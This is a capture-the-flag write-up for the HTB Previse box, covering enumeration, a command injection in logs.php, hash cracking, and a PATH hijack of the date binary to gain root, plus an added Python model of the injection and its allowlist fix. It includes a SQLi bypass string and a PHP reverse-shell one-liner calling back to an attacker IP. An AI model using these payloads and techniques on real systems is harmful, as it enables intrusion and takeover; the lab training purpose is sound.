Hello everyone, in this post I will be sharing my writeup for the HTB Previse machine, an easy-difficulty Linux box. Starting off with nmap we see only two ports. Port 80 serves a web page with a login form; trying SQLi to bypass the login did not work, but running a fuzzing tool showed some PHP files whose responses we can read without being authenticated, and those revealed how to register a user. After creating an account we can download an archive containing the source code of the web pages. Of these, config.php holds the MySQL credentials and logs.php is vulnerable to command injection, which gives us a reverse shell as www-data. Cracking a hash from the database escalates us to the user m4lwhere, who can run a script that calls gzip and date by relative path; that leads to a PATH variable exploit and escalates our privileges to root.
NMAP
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 53:ed:44:40:11:6e:8b:da:69:85:79:c0:81:f2:3a:12 (RSA)
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-favicon: Unknown favicon MD5: B21DD667DF8D81CAE6DD1374DD548004
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Previse Login
|_Requested resource was login.php
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
PORT 80 (HTTP)
On the web server we see a PHP login page.
I tried the basic credentials admin:admin, which didn't work, then moved on to a manual SQLi bypass with admin' or 1=1 -- which didn't work either. I ran sqlmap but it didn't find any SQLi.
So I ran gobuster to fuzz for files.
We can see some pages being redirected to login.php again, but we can still read the response of those pages if we capture it with Burp Suite.
Looking at the HTML response, we can see that without logging in we can view some PHP pages that contain HTML, so we don't really need Burp Suite to view the responses; we can use curl.
We can see that an account can be made with accounts.php.
To create a user we need to make a POST request to accounts.php with the username, password and confirm parameters; note that the username and password must be between 5 and 32 characters long.
curl -X POST -d "username=arz101&password=123456789&confirm=123456789" http://10.10.11.104/accounts.php
Now we can log in to the site.
Navigating to Files, we can see a backup archive that we can download.
Extracting the archive we find some PHP files, of which config.php and logs.php are the interesting ones to look at. From config.php we can find the MySQL credentials.
From logs.php it seems that we can inject commands, as the input is not properly sanitized before it is used.
We can see the delim parameter is meant to be set to comma, space or tab.
This allows us to make a request to our machine, which means we can fetch the phpbash file, an interactive web shell in the browser, and then get a reverse shell from that.
Now just copy and paste this PHP reverse shell code:
php -r '$sock=fsockopen("10.10.14.45",2222);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'
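The logs.php bug above comes down to where the delim value ends up. The Python below is an added model of that pattern, not the box's PHP: the vulnerable builder splices the field straight into a command string, while the hardened one maps it through an allowlist of the three documented values and passes the result as a single argv element (the export-logs helper name is hypothetical, standing in for whatever the real page invoked).

```python
import shlex
from typing import List, Optional

# The three documented delim names mapped to the actual delimiter characters.
ALLOWED_DELIMS = {"comma": ",", "space": " ", "tab": "\t"}


def vulnerable_command(delim: str) -> str:
    """Vulnerable pattern (model of the page's logs.php, not its code): raw
    concatenation into a shell command string. Any shell metacharacter in
    `delim` is interpreted by the shell, so a value such as "comma; id" runs a
    second command. Returns the string only; nothing is executed here."""
    return "export-logs --delim " + delim


def validate_delim(delim: str) -> Optional[str]:
    """Allowlist lookup: exact match on one of the three names, else None.
    The user's text is only ever a dictionary key, so it never reaches a shell."""
    return ALLOWED_DELIMS.get(delim)


def build_safe_argv(delim: str) -> Optional[List[str]]:
    """Hardened pattern: validated delimiter passed as one argv element, for
    subprocess.run(argv) without shell=True. Even a delimiter consisting of a
    space or a tab stays a single argument."""
    sep = validate_delim(delim)
    if sep is None:
        return None
    return ["export-logs", "--delim", sep]


def build_safe_shell_string(delim: str) -> Optional[str]:
    """Defence in depth when a shell string is unavoidable: allowlist first,
    then shlex.quote so the argument is quoted for the shell."""
    sep = validate_delim(delim)
    if sep is None:
        return None
    return "export-logs --delim " + shlex.quote(sep)


if __name__ == "__main__":
    # Constructed inputs: two legitimate values and one injection attempt.
    for value in ("comma", "tab", "comma; id"):
        print(repr(value), "->", repr(vulnerable_command(value)),
              "|", build_safe_argv(value))
```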
Stabilizing the shell with Python
Using the MySQL creds we found earlier, we see the password hash of the user m4lwhere; the other entries are accounts like the one I made, since this is a shared instance, so we need to crack m4lwhere's hash. Cracking this hash could take long; for me it took 11 minutes.
Now that we have the user's password we can log in through SSH.
Running sudo -l, we can see that this user can run the script in /opt/scripts as root.
Looking at the script we can see it uses gzip without its absolute binary path, i.e. /bin/gzip, and the same goes for the date binary.
So we can abuse this through a PATH variable exploit: we create a fake binary that spawns a bash shell, a reverse shell, or makes bash SUID, and then prepend its directory to the PATH variable. We can do this for either gzip or date, but here I'll be showing it with the date binary.
And boom we got root